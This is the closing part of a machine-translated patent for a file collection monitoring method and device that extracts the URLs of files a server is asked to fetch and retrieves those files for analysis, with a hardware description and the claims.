  FIG. 16 is a diagram illustrating the computer 1000 that executes the file collection monitoring program according to the present embodiment. As shown in FIG. 16, for example, the computer 1000 includes a memory 1010, a CPU (Central Processing Unit) 1020, a hard disk drive interface 1030, a disk drive interface 1040, a serial port interface 1050, a video adapter 1060, a network, and the like. Interface 1070. These units are connected by a bus 1080.

  The memory 1010 includes a ROM (Read Only Memory) 1011 and a RAM (Random Access Memory) 1012. The ROM 1010 stores a boot program such as BIOS (Basic Input Output System). The hard disk drive interface 1030 is connected to the hard disk drive 1090. The disk drive interface 1040 is connected to the disk drive 1100. A removable storage medium such as a magnetic disk or an optical disk is inserted into the disk drive 1100, for example. For example, a mouse 1110 and a keyboard 1120 are connected to the serial port interface 1050. For example, a display 1130 is connected to the video adapter 1060.

  Here, as shown in FIG. 16, the hard disk drive 1090 stores, for example, an OS (Operating System) 1091, an application program 1092, a program module 1093, and program data 1094. The file collection monitoring program according to the present embodiment is stored in, for example, the hard disk drive 1090 as a program module in which a command executed by the computer 1000 is described. Specifically, a server transmission / reception access monitoring procedure for executing information processing similar to that of the server transmission / reception access monitoring unit 621 described in the above embodiment, and a transfer destination specifying procedure for executing information processing similar to that of the transfer destination specifying unit 622, Similar to the data reception unit access monitoring procedure for executing the same information processing as the data reception unit access monitoring unit 623, the access data management procedure for executing the same information processing as the access data management unit 624, and the character string analysis environment 631 The hard disk drive 1090 stores a program module in which the character string analysis environment procedure for executing the information processing and the operation environment procedure for executing the same information processing as the operation environment 632 and the operation environment 633 are described.

  Further, like the data stored in the analysis data collection unit 625 described in the above embodiment, data used for information processing by the file collection monitoring program is stored in the hard disk drive 1090 as program data, for example. Then, the CPU 1020 reads the program module and program data stored in the hard disk drive 1090 to the RAM 1012 as necessary, and performs a server transmission / reception access monitoring procedure, a transfer destination specifying procedure, a data receiving unit access monitoring procedure, and access data. The management procedure, the character string analysis environment procedure, and the operating environment procedure are executed.

  Note that the program module and program data related to the information transmission / reception program are not limited to being stored in the hard disk drive 1090, but are stored in, for example, a removable storage medium and read out by the CPU 1020 via the disk drive 1100 or the like. May be. Alternatively, a program module and program data related to the information transmission / reception program are stored in another computer connected via a network such as a LAN (Local Area Network) or a WAN (Wide Area Network), and the CPU 1020 via the network interface 1070. May be read.

  These embodiments and modifications thereof are included in the invention disclosed in the claims and equivalents thereof as well as included in the technology disclosed in the present application.

1, 2, 3, 4 Network 6 File collection monitoring device 7 Data transfer processing function 61 Server terminal unit 62 Data transfer unit 63 Data receiving unit 621 Server transmission / reception access monitoring unit 622 Transfer destination specifying unit 623 Data receiving unit access monitoring unit 624 Access Data management unit 625 Analysis data collection unit 631 Character string analysis environment 632, 633 Operating environment

Claims (8)

A file collection monitoring method by a computer for monitoring communication of a server terminal,
The computer is
A receiving step of receiving an operation execution request from the outside is any file on the network request to obtain the server terminal,
A determination step of determining whether or not file acquisition has occurred by the server terminal in response to the operation execution request received by the reception step;
A specifying step of analyzing the operation execution request and specifying a unified resource location specifier that is a location of the arbitrary file in the network when it is determined by the determination step that file acquisition by the server terminal does not occur When,
A generation step of generating a file acquisition request, which is a request for acquiring the arbitrary file, using the unified resource location specifier specified by the specifying step;
An acquisition step of acquiring the arbitrary file by sending the file acquisition request generated by the generation step to a network;
Only including,
The specifying step specifies an execution step for executing an operation corresponding to the operation execution request with reference to a character string characteristic included in the operation execution request, and responds to the specified operation step according to the operation execution request. A file collection monitoring method characterized by identifying the unified resource location specifier by executing an operation .   The specifying step specifies, as the unified resource location specifier, a character string from a predetermined first character string to a second character string determined separately in the character string of the operation execution request. The file collection monitoring method according to claim 1, wherein: If there's a new operation execution request before Symbol of the optionally obtained by the obtaining step file, defined separately from the first character string predetermined in the string of the new operation execution request file collection monitoring method according to claim 1 or 2, wherein, further including a post-acquisition specifying step of specifying a character string immediately before the second character string as a new Uniform resource locators. If there's a new operation execution request before Symbol of the optionally obtained by the obtaining step file, with reference to the characteristics of the character string of the new operation execution request, corresponding to the new operation execution request And further including a post-acquisition specifying step for specifying a new unified resource location specifier by causing the specified execution step to execute an operation according to the new operation execution request . The file collection monitoring method according to claim 1 .   The acquisition step refers to a storage unit storing a unified resource location specifier before sending the file acquisition request to the network, and whether the unified resource location specifier of the file to be obtained at present is stored. 2. The file collection monitoring method according to claim 1, wherein the file acquisition request is sent to the network on the condition that the unified resource location specifier is not stored in the storage unit. . In the case where the operation execution request is encoded, the specifying step decodes the operation execution request, analyzes a character string of the decoded operation execution request, and extracts a unified resource of the arbitrary file. file collection monitoring method according to any one of claims 1-5, characterized in that identifying the position specifier. A receiving unit that receives an operation execution request from the outside, which is a request for the server terminal to acquire an arbitrary file on the network;
A determination unit that determines whether or not file acquisition has occurred by the server terminal in response to the operation execution request received by the reception unit;
An execution unit that executes an operation according to the operation execution request;
When the determination unit determines that file acquisition by the server terminal does not occur, the specifying unit that analyzes the operation execution request and specifies a unified resource location specifier that is a position of the arbitrary file in the network When,
A generating unit that generates a file acquisition request that is a request to acquire the arbitrary file using the unified resource location specifier specified by the specifying unit;
An acquisition unit that acquires the arbitrary file by sending the file acquisition request generated by the generation unit to a network;
I have a,
The specifying unit specifies an execution unit that executes an operation according to the operation execution request with reference to characteristics of the character string included in the operation execution request, and responds to the operation execution request to the specified execution unit. A file collection monitoring apparatus characterized by identifying the unified resource location specifier by executing an operation . A reception procedure for receiving an operation execution request from the outside, which is a request for the server terminal to acquire an arbitrary file on the network;
A determination procedure for determining whether or not file acquisition occurs by the server terminal in response to the operation execution request received by the reception procedure;
An execution procedure for executing an operation according to the operation execution request;
A specific procedure for analyzing the operation execution request and identifying a unified resource location specifier that is the location of the arbitrary file in the network when it is determined by the determination procedure that file acquisition by the server terminal does not occur When,
A generation procedure for generating a file acquisition request that is a request for acquiring the arbitrary file using the unified resource location specifier specified by the specific procedure;
An acquisition procedure for acquiring the arbitrary file by sending the file acquisition request generated by the generation procedure to a network;
To the computer ,
The specifying procedure refers to the characteristics of the character string included in the operation execution request, specifies an execution procedure for executing an operation according to the operation execution request, and responds to the specified execution procedure according to the operation execution request. A file collection monitoring program that identifies the unified resource location specifier by executing an operation .

Images